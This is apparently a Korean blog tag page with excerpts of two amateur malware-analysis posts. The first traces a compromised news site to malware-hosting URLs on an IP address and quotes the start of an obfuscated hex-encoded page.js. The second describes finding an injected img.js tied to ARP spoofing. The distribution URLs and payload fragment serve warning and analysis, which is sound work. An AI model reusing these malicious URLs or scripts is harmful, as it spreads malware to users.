eval 함수 썸네일형 리스트형 폴리뉴스 악성코드 유포 스크립트 간단하게 살펴보기.. !! * 본사이트는 악성코드가 있는 사이트를 알려 드립니다.!! 유포지 : http://www.polinews.co.kr [연결 되는 곳] http://204.188.243.136:7x/page/page.js http://204.188.243.136:7x/page/vospt.html http://204.188.243.136:7x/page/vegoa.htm http://204.188.243.136:7x/page/vtfep.htm[차례] page.js 보기 page.js 해석된 코드 vegoa.htm , vtfep.htm 메인코드 보기 ! Page.js 보기 !! var figwZPKw1="\x65\x6c\x67\x68\x35\x39\x33\x6b\x37\x73\x6b\x65\x72\x67\x35\x67\x73\.. 더보기 ARP 스푸핑 파일과 연결시켜주는 스크립트 img.js , kol.html !! * 이 글은 아주 비전문가인 제가 그냥 한것이므로 많은 오류와 잘못된 정보가 있을 수 있음을 알려드립니다. img.js 를 찾을려면 일단 감염된 사이트를 찾아야 한다. 오늘자로 유포된 img.js는 유포된 사이트에서 찾는데 스크립트를 사이사이에 끼워놔서 찾기가 너무 어려웠다. 사이트 스크립트 중간중간에 이런식으로 들어 있기 때문에 찾는데 꽤 어려움을 겪었다. 이렇게 img.js를 본다면 다음에 기다릴것은 내부 안의 코드이다. 이렇게 보면 역시 아스키 코드로 이루어 져있다. 이런 코드 해독 방법은 아스키 코드를 아시는 분이라면 잘 하실수 있을것입니다. 하지만 저는 아직 잘 모르기 때문에 멀질라라는 프로그램으로 해독하는 방법으로 선택하였습니다. 이런 식으로 간단하게 뜨는 것을 확인 할 수 있습니다. 아이프레.. 더보기 이전 1 다음
